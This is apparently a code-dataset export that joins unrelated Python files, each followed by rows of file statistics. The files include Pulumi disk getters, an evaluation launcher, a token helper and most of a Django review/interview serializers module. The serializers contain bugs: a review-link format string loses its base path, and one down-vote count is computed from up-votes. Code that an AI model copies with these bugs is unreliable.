    # Size in GB; may be computed from the source snapshot when omitted.
    return pulumi.get(self, "size")
@property
@pulumi.getter
def snapshot(self) -> pulumi.Output[Optional[str]]:
    """
    The source snapshot used to create this disk. You can provide this as
    a partial or full URL to the resource. For example, the following are
    valid values:
    * `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
    * `projects/project/global/snapshots/snapshot`
    * `global/snapshots/snapshot`
    * `snapshot`
    """
    # Accepts full URL, partial path, or bare snapshot name.
    return pulumi.get(self, "snapshot")
@property
@pulumi.getter(name="sourceSnapshotEncryptionKey")
def source_snapshot_encryption_key(self) -> pulumi.Output[Optional['outputs.RegionDiskSourceSnapshotEncryptionKey']]:
    """
    The customer-supplied encryption key of the source snapshot. Required
    if the source snapshot is protected by a customer-supplied encryption
    key.
    Structure is documented below.
    """
    # Nested structure; see RegionDiskSourceSnapshotEncryptionKey output type.
    return pulumi.get(self, "source_snapshot_encryption_key")
@property
@pulumi.getter(name="sourceSnapshotId")
def source_snapshot_id(self) -> pulumi.Output[str]:
    """
    The unique ID of the snapshot used to create this disk. This value identifies the exact snapshot that was used to create
    this persistent disk. For example, if you created the persistent disk from a snapshot that was later deleted and
    recreated under the same name, the source snapshot ID would identify the exact version of the snapshot that was used.
    """
    # Output-only: pins the exact snapshot version, unlike `snapshot` which is a name/URL.
    return pulumi.get(self, "source_snapshot_id")
@property
@pulumi.getter
def type(self) -> pulumi.Output[Optional[str]]:
    """
    URL of the disk type resource describing which disk type to use to
    create the disk. Provide this when creating the disk.
    """
    # e.g. a pd-ssd / pd-standard disk-type URL.
    return pulumi.get(self, "type")
@property
@pulumi.getter
def users(self) -> pulumi.Output[Sequence[str]]:
    """
    Links to the users of the disk (attached instances) in form: project/zones/zone/instances/instance
    """
    # Output-only: instances currently attached to this disk.
    return pulumi.get(self, "users")
| 50.240755
| 218
| 0.65885
| 8,242
| 66,569
| 5.194128
| 0.049381
| 0.063466
| 0.052651
| 0.044709
| 0.949054
| 0.934151
| 0.911773
| 0.903784
| 0.894721
| 0.883579
| 0
| 0.004359
| 0.259039
| 66,569
| 1,324
| 219
| 50.278701
| 0.863558
| 0.484385
| 0
| 0.771681
| 1
| 0.010619
| 0.149268
| 0.05635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.164602
| false
| 0.00177
| 0.012389
| 0
| 0.277876
| 0.026549
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e97446dfdb4d3416e8d65b1ffa0d8fe648abc60
| 95
|
py
|
Python
|
tests/__init__.py
|
Martynas-P/bencode
|
d4b2a406e07aa828bfc02eb1ed3bd68efbe1c6cb
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
Martynas-P/bencode
|
d4b2a406e07aa828bfc02eb1ed3bd68efbe1c6cb
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
Martynas-P/bencode
|
d4b2a406e07aa828bfc02eb1ed3bd68efbe1c6cb
|
[
"Apache-2.0"
] | null | null | null |
from tests.test_decode import DecodeBencodeTest
from tests.test_encode import EncodeBencodeTest
| 47.5
| 47
| 0.905263
| 12
| 95
| 7
| 0.666667
| 0.214286
| 0.309524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073684
| 95
| 2
| 48
| 47.5
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ea2e22360be1bffa8ed8d08e71c0d738defd665
| 540
|
py
|
Python
|
eval_medseg_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_medseg_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_medseg_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os

# Shell-command template for one evaluation fold. The original script listed
# the five commands verbatim; they differ only in the fold index.
_COMMAND_TEMPLATE = ("python main.py --configs "
                     "configs/eval_medseg_unetplusplus_timm-regnetx_002_{fold}_GridDistortion.yml")

# Number of folds in this experiment.
_NUM_FOLDS = 5

# Commands for every fold, in run order. Exposed at module level so it can be
# inspected/extended without editing the loop below.
COMMANDS = [_COMMAND_TEMPLATE.format(fold=i) for i in range(_NUM_FOLDS)]


def main() -> None:
    """Run each per-fold evaluation config sequentially.

    NOTE: os.system passes the command through the shell; the commands here
    are static strings, so no untrusted input reaches the shell.
    """
    for command in COMMANDS:
        os.system(command)


if __name__ == "__main__":
    main()
| 49.090909
| 102
| 0.846296
| 80
| 540
| 5.3375
| 0.3
| 0.117096
| 0.140515
| 0.222482
| 0.885246
| 0.885246
| 0.885246
| 0.885246
| 0.885246
| 0.885246
| 0
| 0.039293
| 0.057407
| 540
| 11
| 103
| 49.090909
| 0.799607
| 0
| 0
| 0
| 0
| 0
| 0.878004
| 0.64695
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
70dd040d24aabd8780e0510426ec2848cf88cefd
| 108
|
py
|
Python
|
app/views/viewApi.py
|
WalterSilva5/WS-BI
|
295e2d99abf39e231aa52b00c5c4c2765a62ce68
|
[
"MIT"
] | null | null | null |
app/views/viewApi.py
|
WalterSilva5/WS-BI
|
295e2d99abf39e231aa52b00c5c4c2765a62ce68
|
[
"MIT"
] | null | null | null |
app/views/viewApi.py
|
WalterSilva5/WS-BI
|
295e2d99abf39e231aa52b00c5c4c2765a62ce68
|
[
"MIT"
] | null | null | null |
from .viewsApi.api_vendas_do_dia_por_vendedor import *
from .viewsApi.api_vendas_do_dia_por_filial import *
| 36
| 54
| 0.87037
| 18
| 108
| 4.666667
| 0.555556
| 0.285714
| 0.357143
| 0.5
| 0.690476
| 0.690476
| 0.690476
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 108
| 2
| 55
| 54
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
70e7f836b24bca12986f2be4197c4ce8b8c7ec8f
| 85
|
py
|
Python
|
accounts/helpers.py
|
mcm66103/ez-django
|
2e097facc4fac99b9bae450147319120ba908902
|
[
"MIT"
] | 1
|
2019-11-15T14:13:22.000Z
|
2019-11-15T14:13:22.000Z
|
accounts/helpers.py
|
mcm66103/ez-django
|
2e097facc4fac99b9bae450147319120ba908902
|
[
"MIT"
] | 11
|
2019-12-20T13:15:03.000Z
|
2022-03-12T00:04:36.000Z
|
accounts/helpers.py
|
mcm66103/ez-django
|
2e097facc4fac99b9bae450147319120ba908902
|
[
"MIT"
] | null | null | null |
import secrets
def generate_confirmation_number(nbytes: int = 16) -> str:
    """Return a cryptographically secure random hex confirmation token.

    Generalized from the original hard-coded 16 bytes: callers may now pick
    the entropy size, while the no-argument call keeps its old behavior.

    :param nbytes: number of random bytes; the result has ``2 * nbytes``
        lowercase hexadecimal characters (default 16 -> 32 chars).
    :return: hex string suitable for use as a confirmation number.
    """
    # `secrets` (not `random`) because the token is security-sensitive.
    return secrets.token_hex(nbytes)
| 21.25
| 36
| 0.8
| 11
| 85
| 5.909091
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027027
| 0.129412
| 85
| 4
| 37
| 21.25
| 0.851351
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
cb1027de6390074d959f3cabd4bc9f1e23e66ff7
| 51,681
|
py
|
Python
|
review/serializers.py
|
yazdanv/backend
|
49da8d46e108bc2000fdabc1b991836f2cc50687
|
[
"MIT"
] | 2
|
2021-06-11T21:41:05.000Z
|
2021-06-16T03:58:16.000Z
|
review/serializers.py
|
salva-imm/backend
|
4201eccac5c040caac8330911ed0530385dd1b69
|
[
"MIT"
] | null | null | null |
review/serializers.py
|
salva-imm/backend
|
4201eccac5c040caac8330911ed0530385dd1b69
|
[
"MIT"
] | 1
|
2021-05-10T04:40:22.000Z
|
2021-05-10T04:40:22.000Z
|
import re
from datetime import date, datetime
from django.db import transaction
from django.db.models import Q
from django.conf import settings
from rest_framework import serializers
from bs4 import BeautifulSoup
from review.models import Pros, Cons, CompanyReview, Interview, ReviewComment, InterviewComment
from review.permissions import (check_create_company_review_permission, check_create_interview_permission,
check_create_review_comment_permission, check_create_interview_comment_permission)
from company.models import Company
from job.models import Job
from company.serializers import PublicUserCompanySerializer
from job.serializers import PublicUserJobSerializer
from review import utilities as review_utilities
from utilities import utilities
class ProsSerializer(serializers.Serializer):
    """Read/write serializer for `Pros` tags attached to company reviews."""

    id = serializers.ReadOnlyField()
    name = serializers.CharField(max_length=100, min_length=2)
    icon = serializers.CharField(max_length=50, required=False)
    logo = serializers.CharField(max_length=200, required=False)
    is_deleted = serializers.ReadOnlyField()

    def validate_logo(self, logo):
        # Delegates existence checking of the uploaded file to the shared
        # utilities helper; it is expected to raise on a missing file —
        # TODO confirm against utilities.check_file_exist.
        utilities.check_file_exist(logo)
        return logo

    @transaction.atomic
    def create(self, validated_data):
        pros = Pros(**validated_data)
        pros.save()
        return pros

    @transaction.atomic
    def update(self, instance, validated_data):
        # NOTE(review): only `icon` is updatable here; `name` and `logo`
        # changes are silently ignored — confirm this is intentional.
        instance.icon = validated_data.get('icon', instance.icon)
        instance.save()
        return instance

    def to_internal_value(self, data):
        # No-op override: passes straight through to the base implementation.
        data = super().to_internal_value(data)
        return data

    def to_representation(self, instance):
        # No-op override: passes straight through to the base implementation.
        instance = super().to_representation(instance)
        return instance
class UserProsSerializer(serializers.Serializer):
    """Read-only projection of a `Pros` tag for user-facing responses."""

    # All fields are read-only: this serializer is never used for writes.
    id = serializers.ReadOnlyField()
    name = serializers.ReadOnlyField()
    icon = serializers.ReadOnlyField()
    logo = serializers.ReadOnlyField()
    priority = serializers.ReadOnlyField()
class ConsSerializer(serializers.Serializer):
    """Read/write serializer for `Cons` tags; mirrors ProsSerializer."""

    id = serializers.ReadOnlyField()
    name = serializers.CharField(max_length=100, min_length=2)
    icon = serializers.CharField(max_length=50, required=False)
    logo = serializers.CharField(max_length=200, required=False)
    is_deleted = serializers.ReadOnlyField()

    def validate_logo(self, logo):
        # Delegates existence checking of the uploaded file to the shared
        # utilities helper; expected to raise on a missing file — TODO confirm.
        utilities.check_file_exist(logo)
        return logo

    @transaction.atomic
    def create(self, validated_data):
        cons = Cons(**validated_data)
        cons.save()
        return cons

    @transaction.atomic
    def update(self, instance, validated_data):
        # NOTE(review): only `icon` is updatable here; `name` and `logo`
        # changes are silently ignored — confirm this is intentional.
        instance.icon = validated_data.get('icon', instance.icon)
        instance.save()
        return instance

    def to_internal_value(self, data):
        # No-op override: passes straight through to the base implementation.
        data = super().to_internal_value(data)
        return data

    def to_representation(self, instance):
        # No-op override: passes straight through to the base implementation.
        instance = super().to_representation(instance)
        return instance
class UserConsSerializer(serializers.Serializer):
    """Read-only projection of a `Cons` tag for user-facing responses."""

    # All fields are read-only: this serializer is never used for writes.
    id = serializers.ReadOnlyField()
    name = serializers.ReadOnlyField()
    icon = serializers.ReadOnlyField()
    logo = serializers.ReadOnlyField()
    priority = serializers.ReadOnlyField()
class CompanyReviewSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
company = PublicUserCompanySerializer()
job = PublicUserJobSerializer()
recommend_to_friend = serializers.BooleanField()
pros = ProsSerializer(many=True, required=False)
cons = ConsSerializer(many=True, required=False)
state = serializers.ChoiceField(choices=settings.STATE_CHOICES)
# ratings
work_life_balance = serializers.ChoiceField(choices=settings.RATE_CHOICES)
salary_benefit = serializers.ChoiceField(choices=settings.RATE_CHOICES)
security = serializers.ChoiceField(choices=settings.RATE_CHOICES)
management = serializers.ChoiceField(choices=settings.RATE_CHOICES)
culture = serializers.ChoiceField(choices=settings.RATE_CHOICES)
title = serializers.CharField(max_length=100)
anonymous_job = serializers.BooleanField(default=False)
description = serializers.CharField(max_length=40000, required=False, allow_blank=True)
salary = serializers.IntegerField()
salary_type = serializers.ChoiceField(choices=CompanyReview.SALARY_CHOICES)
start_date = serializers.DateField(required=False)
end_date = serializers.DateField(required=False)
current_work = serializers.BooleanField(default=False)
is_deleted = serializers.ReadOnlyField()
has_legal_issue = serializers.ReadOnlyField()
creator_data = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
vote_state = serializers.ReadOnlyField()
view_count = serializers.ReadOnlyField()
over_all_rate = serializers.ReadOnlyField()
approved = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
my_review = serializers.ReadOnlyField()
reply = serializers.ReadOnlyField()
reply_created = serializers.ReadOnlyField()
total_review = serializers.ReadOnlyField()
rate_avg = serializers.ReadOnlyField()
def validate(self, data):
if data.get('salary'):
salary = review_utilities.salary_handler(data['salary'], data['salary_type'])
if salary > 50000000: # 50 million toman
raise serializers.ValidationError({'salary': ['Max Salary in month is 50 million toman :(.']})
if data.get('pros') and len(data['pros']) > 20:
raise serializers.ValidationError({'pros': ['Pros list must len 0, 20 item']})
if data.get('cons') and len(data['cons']) > 20:
raise serializers.ValidationError({'cons': ['Cons list must len 0, 20 item']})
if data.get('start_date') and date.today() < data['start_date']:
raise serializers.ValidationError({'start_date': ['Start date must be lower than today']})
if data.get('start_date') and data.get('end_date') and data['end_date'] < data['start_date']:
raise serializers.ValidationError({'end_date': ['End date must be greater than start date']})
return data
@transaction.atomic
def create(self, validated_data):
validated_data['company'] = Company.objects.get(company_slug=validated_data['company']['company_slug'])
validated_data['creator'] = self.context['request'].user
check_create_company_review_permission(validated_data['creator'], validated_data['company'])
if validated_data.get('pros') is not None:
pros_list = validated_data.pop('pros')
else:
pros_list = []
if validated_data.get('cons') is not None:
cons_list = validated_data.pop('cons')
else:
cons_list = []
if validated_data.get('description') is not None and not validated_data['description'].split(): # blank checking
validated_data.pop('description')
validated_data['job'] = Job.objects.get(job_slug=validated_data['job']['job_slug'])
validated_data['salary'] = review_utilities.salary_handler(validated_data['salary'], validated_data['salary_type'])
validated_data['over_all_rate'] = round((validated_data['work_life_balance'] + validated_data['salary_benefit']
+ validated_data['security'] + validated_data['management'] +
validated_data['culture']) / 5, 1)
validated_data['ip'] = utilities.get_client_ip(self.context['request'])
validated_data['approved'] = False
company_review = CompanyReview(**validated_data)
company_review.save()
for pros_data in pros_list:
pros = Pros.objects.get(name=pros_data['name'])
company_review.pros.add(pros)
pros.add_cons_priority()
for cons_data in cons_list:
cons = Cons.objects.get(name=cons_data['name'])
company_review.cons.add(cons)
cons.add_cons_priority()
validated_data['company'].handle_company_review_statics()
review_link = '{}/review/{}'.format(settings.WEB_BASE_PATH, company_review.pk)
utilities.telegram_notify('New review: on {}, \n by {} {}, \n link: {} {}'.format(company_review.company.name,
company_review.creator.first_name,
company_review.creator.last_name,
review_link,
'#review'),
company_review.id, 'review', company_review.title, company_review.description,
'{} {}'.format(company_review.creator.first_name, company_review.creator.last_name))
return company_review
@transaction.atomic
def update(self, instance, validated_data):
# permissions.check_update_permission(instance, validated_data)
instance.recommend_to_friend = validated_data.get('recommend_to_friend', instance.recommend_to_friend)
instance.state = validated_data.get('state', instance.state)
instance.work_life_balance = validated_data.get('work_life_balance', instance.work_life_balance)
instance.salary_benefit = validated_data.get('salary_benefit', instance.salary_benefit)
instance.security = validated_data.get('security', instance.security)
instance.management = validated_data.get('management', instance.management)
instance.culture = validated_data.get('culture', instance.culture)
instance.anonymous_job = validated_data.get('anonymous_job', instance.anonymous_job)
instance.start_date = validated_data.get('start_date', instance.start_date)
instance.end_date = validated_data.get('end_date', instance.end_date)
instance.current_work = validated_data.get('current_work', instance.current_work)
instance.over_all_rate = (instance.work_life_balance + instance.salary_benefit + instance.security +
instance.management + instance.culture) / 5
if (validated_data.get('salary', None) is not None and validated_data['salary'] != instance.salary) or\
(validated_data.get('salary_type') and validated_data['salary_type'] != instance.salary_type):
instance.salary = review_utilities.salary_handler(validated_data['salary'], validated_data['salary_type'])
instance.salary_type = validated_data.get('salary_type', instance.salary_type)
instance.title = validated_data.get('title', instance.title)
instance.description = validated_data.get('description', instance.description)
if validated_data.get('pros'):
instance.pros.clear()
for pros_data in validated_data['pros']:
pros = Pros.objects.get(name=pros_data['name'])
instance.pros.add(pros)
pros.add_cons_priority()
if validated_data.get('cons'):
instance.cons.clear()
for cons_data in validated_data['cons']:
cons = Cons.objects.get(name=cons_data['name'])
instance.cons.add(cons)
cons.add_cons_priority()
if validated_data.get('job') and instance.job.name != validated_data['job']['name']:
instance.job = Job.objects.get(job_slug=validated_data['job']['job_slug'])
instance.save()
instance.company.handle_company_review_statics()
review_link = '/review/{}'.format(settings.WEB_BASE_PATH, instance.pk)
utilities.telegram_notify('Review update: on {}, \n by {} {}, \n link: {} {}'.format(instance.company.name,
instance.creator.first_name,
instance.creator.last_name,
review_link,
'#update_review'),
instance.id, 'review', instance.title, instance.description,
'{} {}'.format(instance.creator.first_name, instance.creator.last_name))
return instance
def to_internal_value(self, data):
    """Ensure referenced Pros/Cons/Job rows exist before field validation.

    Missing Pros/Cons are created by their (stripped) name.  The job is
    looked up by name or by a derived slug and created when absent; the
    resolved slug is written back into ``data`` so create/update can fetch
    the Job by ``job_slug``.
    """
    for pros_data in data.get('pros') or []:
        name = pros_data['name'].strip()
        # get-or-create by name; an empty queryset is falsy
        if not Pros.objects.filter(name=name):
            Pros(name=name).save()
    for cons_data in data.get('cons') or []:
        name = cons_data['name'].strip()
        if not Cons.objects.filter(name=name):
            Cons(name=name).save()
    if data.get('job'):
        name = data['job']['name'].strip()
        # Slugify once: dash-join the word-ish tokens.  Raw string fixes the
        # invalid '\w' escape of the original non-raw literal.
        slug = '-'.join(re.findall(r'[\w-]+', name)).lower()
        job = Job.objects.filter(Q(name=name) | Q(job_slug=slug))
        if not job:
            job = Job(name=name, job_slug=slug)
            job.save()
        else:
            job = job[0]
        data['job']['job_slug'] = job.job_slug
    return super().to_internal_value(data)
def to_representation(self, instance):
    """Decorate a review instance with computed display fields.

    Salary is normalized through the shared salary handler and expressed in
    millions of toman (one decimal); vote/view counters, formatted dates and
    creator profile stats are attached before the default serialization.
    """
    instance.creator_data = {'name': instance.creator.username}
    # normalize to a monthly figure, then express in millions (1 decimal)
    instance.salary = round(review_utilities.salary_handler(instance.salary,
                                                            instance.salary_type, resp=True)/100000)/10
    self.fields['salary'] = serializers.FloatField()
    instance.vote_count = instance.vote.count()
    # BUG FIX: down-vote count previously mirrored vote.count(); every
    # sibling serializer in this file reads down_vote.count()
    instance.down_vote_count = instance.down_vote.count()
    instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
    # live view relation plus the denormalized historical counter
    instance.view_count = instance.view.count() + instance.total_view
    instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
    instance.my_review = instance.creator == self.context['request'].user
    instance.start_date = instance.start_date.strftime('%Y-%m') if instance.start_date else 'نامشخص'
    instance.end_date = instance.end_date.strftime('%Y-%m') if instance.end_date else 'نامشخص'
    instance.total_review = instance.creator.profile.total_review
    instance.rate_avg = instance.creator.profile.rate_avg
    instance = super().to_representation(instance)
    return instance
class UserCompanyReviewSerializer(serializers.Serializer):
    """Read-only detail representation of a company review for end users.

    Anonymous reviews hide the job from everyone but the author; reviews
    flagged with a legal issue are fully redacted (title/description
    replaced, ratings and salary zeroed, pros/cons emptied).
    """
    id = serializers.ReadOnlyField()
    company = PublicUserCompanySerializer()
    job = PublicUserJobSerializer()
    recommend_to_friend = serializers.BooleanField()
    pros = UserProsSerializer(many=True)
    cons = UserConsSerializer(many=True)
    state = serializers.ReadOnlyField()
    # ratings
    work_life_balance = serializers.ReadOnlyField()
    salary_benefit = serializers.ReadOnlyField()
    security = serializers.ReadOnlyField()
    management = serializers.ReadOnlyField()
    culture = serializers.ReadOnlyField()
    title = serializers.ReadOnlyField()
    description = serializers.ReadOnlyField()
    salary = serializers.ReadOnlyField()
    salary_type = serializers.ReadOnlyField()
    vote_count = serializers.ReadOnlyField()
    down_vote_count = serializers.ReadOnlyField()
    vote_state = serializers.ReadOnlyField()
    view_count = serializers.ReadOnlyField()
    over_all_rate = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()
    my_review = serializers.ReadOnlyField()
    start_date = serializers.ReadOnlyField()
    end_date = serializers.ReadOnlyField()
    current_work = serializers.ReadOnlyField()
    anonymous_job = serializers.ReadOnlyField()
    comment_count = serializers.ReadOnlyField()
    has_legal_issue = serializers.ReadOnlyField()
    reply = serializers.ReadOnlyField()
    reply_created = serializers.ReadOnlyField()
    total_review = serializers.ReadOnlyField()
    rate_avg = serializers.ReadOnlyField()

    def to_representation(self, instance):
        """Attach computed counters/flags, applying anonymity and legal redaction."""
        # hide the real job from everyone except the review's author
        if self.context['request'].user != instance.creator and instance.anonymous_job:
            instance.job = Job(name='تخصص مخفی', job_slug='')
        instance.vote_count = instance.vote.count()
        instance.down_vote_count = instance.down_vote.count()
        instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
        # live view relation plus the denormalized historical counter
        instance.view_count = instance.view.count() + instance.total_view
        # average of the five individual ratings, one decimal
        instance.over_all_rate = round((instance.work_life_balance + instance.salary_benefit +
                                        instance.security + instance.management + instance.culture) / 5, 1)
        instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
        instance.my_review = instance.creator == self.context['request'].user
        instance.start_date = instance.start_date.strftime('%Y-%m-%d') if instance.start_date else 'نامشخص'
        instance.end_date = instance.end_date.strftime('%Y-%m-%d') if instance.end_date else 'نامشخص'
        instance.reply_created = instance.reply_created.strftime('%Y-%m-%d %H:%M') if instance.reply_created else None
        if instance.description is None:
            instance.description = ''
        instance.comment_count = instance.reviewcomment_set.count()
        if instance.has_legal_issue:
            # redact content for reviews with a legal takedown
            is_deleted_text = settings.IS_DELETED_TEXT % instance.company.name
            instance.title = is_deleted_text
            instance.description = is_deleted_text
            instance.work_life_balance = 0
            instance.salary_benefit = 0
            instance.security = 0
            instance.management = 0
            instance.culture = 0
            instance.salary = 0
        else:
            instance.salary = round(review_utilities.salary_handler(instance.salary, instance.salary_type, resp=True))
        instance.total_review = instance.creator.profile.total_review
        instance.rate_avg = instance.creator.profile.rate_avg
        instance = super().to_representation(instance)
        # pros/cons are emptied post-serialization so the M2M queries above
        # are skipped on the (already serialized) redacted payload
        if instance['has_legal_issue']:
            instance['pros'] = []
            instance['cons'] = []
        return instance
class UserCompanyReviewListSerializer(serializers.Serializer):
    """Read-only list representation of company reviews.

    Descriptions are stripped of HTML and truncated near 300 characters;
    legally-flagged reviews are redacted.
    """
    id = serializers.ReadOnlyField()
    company = PublicUserCompanySerializer()
    job = PublicUserJobSerializer()
    # ratings
    title = serializers.ReadOnlyField()
    description = serializers.ReadOnlyField()
    vote_count = serializers.ReadOnlyField()
    down_vote_count = serializers.ReadOnlyField()
    vote_state = serializers.ReadOnlyField()
    view_count = serializers.ReadOnlyField()
    over_all_rate = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()
    my_review = serializers.ReadOnlyField()
    state = serializers.ReadOnlyField()
    approved = serializers.ReadOnlyField()
    has_legal_issue = serializers.ReadOnlyField()

    def to_representation(self, instance):
        """Attach computed counters and a truncated plain-text description."""
        # anonymous reviews never expose the real job in list views
        if instance.anonymous_job:
            instance.job = Job(name='تخصص مخفی', job_slug='')
        instance.vote_count = instance.vote.count()
        instance.down_vote_count = instance.down_vote.count()
        instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
        # live view relation plus the denormalized historical counter
        instance.view_count = instance.view.count() + instance.total_view
        instance.over_all_rate = round((instance.work_life_balance + instance.salary_benefit +
                                        instance.security + instance.management + instance.culture) / 5, 1)
        instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
        instance.my_review = instance.creator == self.context['request'].user
        if instance.has_legal_issue:
            # redact content for reviews with a legal takedown
            is_deleted_text = settings.IS_DELETED_TEXT % instance.company.name
            instance.title = is_deleted_text
            instance.description = is_deleted_text
            instance.over_all_rate = 0
            instance.salary = 0
        else:
            if instance.description:
                # keep explicit line breaks, strip other HTML, then cut at a
                # word boundary within the first 300 characters
                instance.description = instance.description.replace('<br>', '<br>\n')
                soup = BeautifulSoup(instance.description, 'html.parser')
                body = soup.get_text()
                if len(body) > 300:
                    instance.description = ' '.join(body[:300].split(' ')[:-1]) + ' ...'
                else:
                    instance.description = body
            else:
                instance.description = ''
        instance = super().to_representation(instance)
        return instance
class UserHomeCompanyReviewListSerializer(serializers.Serializer):
    """Home-page review list serializer.

    Unlike the other serializers here, ``instance`` is a plain dict
    (the keys accessed — ``company__name`` etc. — match a ``.values()``
    queryset row; confirm against the calling view), so all access is by
    key rather than attribute.
    """
    id = serializers.ReadOnlyField()
    company = PublicUserCompanySerializer()
    # ratings
    title = serializers.ReadOnlyField()
    description = serializers.ReadOnlyField()
    over_all_rate = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()
    my_review = serializers.ReadOnlyField()
    approved = serializers.ReadOnlyField()
    has_legal_issue = serializers.ReadOnlyField()

    def to_representation(self, instance):
        """Reshape flat company__* keys into a nested dict and redact/truncate."""
        instance['company'] = {
            'name': instance['company__name'],
            'name_en': instance['company__name_en'],
            'company_slug': instance['company__company_slug'],
            'logo': instance['company__logo'],
        }
        instance['created'] = instance['created'].strftime('%Y-%m-%d %H:%M')
        # 'creator' holds a raw id here, hence comparison against user.id
        instance['my_review'] = instance['creator'] == self.context['request'].user.id
        if instance['has_legal_issue']:
            # redact content for reviews with a legal takedown
            is_deleted_text = settings.IS_DELETED_TEXT % instance['company']['name']
            instance['title'] = is_deleted_text
            instance['description'] = is_deleted_text
            instance['over_all_rate'] = 0
        else:
            if instance['description']:
                # keep explicit line breaks, strip other HTML, then cut at a
                # word boundary within the first 300 characters
                instance['description'] = instance['description'].replace('<br>', '<br>\n')
                soup = BeautifulSoup(instance['description'], 'html.parser')
                body = soup.get_text()
                if len(body) > 300:
                    instance['description'] = ' '.join(body[:300].split(' ')[:-1]) + ' ...'
                else:
                    instance['description'] = body
            else:
                instance['description'] = ''
        instance = super().to_representation(instance)
        return instance
class InterviewSerializer(serializers.Serializer):
    """Create/update serializer for interview reviews.

    Validation caps salaries at 50M toman/month, limits pros/cons to 20
    items each and rejects future interview dates.  ``to_internal_value``
    lazily creates any missing Pros/Cons/Job rows before field validation.
    """
    id = serializers.ReadOnlyField()
    company = PublicUserCompanySerializer()
    job = PublicUserJobSerializer()
    pros = ProsSerializer(many=True, required=False)
    cons = ConsSerializer(many=True, required=False)
    status = serializers.ChoiceField(choices=settings.INTERVIEW_STATUS)
    apply_method = serializers.ChoiceField(choices=settings.APPLY_METHOD)
    # ratings
    interviewer_rate = serializers.ChoiceField(choices=settings.RATE_CHOICES)
    total_rate = serializers.ChoiceField(choices=settings.RATE_CHOICES)
    title = serializers.CharField(max_length=100)
    description = serializers.CharField(max_length=40000, required=False, allow_blank=True)
    asked_salary = serializers.IntegerField()
    offered_salary = serializers.IntegerField()
    interview_date = serializers.DateField()
    response_time_before_review = serializers.ChoiceField(Interview.RESPONSE_TIME_CHOICES)
    response_time_after_review = serializers.ChoiceField(Interview.RESPONSE_TIME_CHOICES, required=False)
    is_deleted = serializers.ReadOnlyField()
    has_legal_issue = serializers.ReadOnlyField()
    creator_data = serializers.ReadOnlyField()
    vote_count = serializers.ReadOnlyField()
    down_vote_count = serializers.ReadOnlyField()
    vote_state = serializers.ReadOnlyField()
    view_count = serializers.ReadOnlyField()
    approved = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()
    my_review = serializers.ReadOnlyField()
    reply = serializers.ReadOnlyField()
    reply_created = serializers.ReadOnlyField()
    total_review = serializers.ReadOnlyField()
    rate_avg = serializers.ReadOnlyField()

    def validate(self, data):
        """Cross-field validation for salary caps, pros/cons size and date."""
